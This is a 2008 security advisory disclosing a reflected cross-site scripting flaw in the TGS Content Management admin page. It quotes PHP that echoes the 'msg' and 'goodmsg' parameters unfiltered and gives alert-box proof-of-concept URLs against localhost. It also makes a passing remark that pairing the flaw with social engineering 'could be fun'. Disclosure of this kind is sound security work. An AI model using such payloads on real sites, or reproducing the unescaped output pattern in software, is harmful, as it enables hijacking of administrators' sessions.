____________________________________________________________________________
____________________________________________________________________________

01010111 01001001 01010010 01000101 01000100  01010011 ->
01000101 01000011 01010101 01010010 01001001  01010100 ->
01011001                                                      

____________________________________________________________________________
ADVISORY: TGS CONTENT MANAGEMENT 0.3.2r3 ADMIN XSS
____________________________________________________________________________

_____________________
|| 0x00: ABOUT ME
|| 0x01: DATELINE
|| 0x02: INFORMATION
|| 0x03: EXPLOITATION
|| 0x04: RISK LEVEL

____________________________________________________________
____________________________________________________________

_________________
|| 0x00: ABOUT ME

Author: SkyOut
Date: June 2008
Website: http://wired-security.net/

_________________
|| 0x01: DATELINE

2007-06-28: Bug found
2007-06-28: Advisory released

____________________
|| 0x02: INFORMATION

The Content Management System TGS (The Green Smurf) is prone to a Cross-Site
Scripting (XSS) vulnerability, that happens on the admin interface due to
bad (or better: no) filtration.

_____________________
|| 0x03: EXPLOITATION

To test this, download and install the CMS from:
http://downloads.sourceforge.net/thegreensmurf/
Direct link: http://downloads.sourceforge.net/thegreensmurf/tgs032r2_12032008.tar.gz

After installation go to the login page, located at (in my case) here:
http://127.0.0.1:8080/tgs/cms/login.php

Login with your credentials...

You will be redirected to this site:
http://127.0.0.1:8080/tgs/cms/index.php?site=main

Now look at the source code, taken from cms/index.php:

--- SNIP ---
if (isset($_GET['msg'])) {
?>
<tr><td><center><table align="center"  width="100%" border="0" bgcolor="#ffb3b5"><tr><td>
<font class='errorBox'><img border='0' src='images/errorBox.gif'>&nbsp;<?php echo $_GET['msg']; ?></font>
</tr></table></center></td></tr>	
<?php 
}
--- SNIP ---

--- SNIP ---
if (isset($_GET['goodmsg'])) {
?>
<tr><td><center><table width="100%" border="0" bgcolor="#05c27d"><tr><td>
<font class='goodBox'><img border='0' src='images/goodBox.gif'>&nbsp;<?php echo $_GET['goodmsg']; ?></font>
</tr></table></center></td></tr>		
<?php 
}
--- SNIP ---

As you can see the parameters "msg" (which is an error text) and "goodmsg" (which is
a normal text) are taken via GET and are not filtered. So do the following:

http://127.0.0.1:8080/tgs/cms/index.php?site=main&msg=%3Cscript%3Ealert(%22XSS%22);%3C/script%3E

OR

http://127.0.0.1:8080/tgs/cms/index.php?site=main&goodmsg=%3Cscript%3Ealert(%22XSS%22);%3C/script%3E

-> Results in:

__________________________________________
|                                      X |
|________________________________________|
|                                        |
|                                        |
|    ^                                   |
|   / \                                  |
|  / | \        XSS                      |
| /  .  \                                |
| -------                                |
|                               ______   |
|                              |  OK  |  |
|                               ------   |
|________________________________________|

In combination with social engineering this could be fun...

___________________
|| 0x04: RISK LEVEL

- LOW - (1/3) -

<!> Happy Hacking <!>

____________________________________________________________________________
____________________________________________________________________________

EOF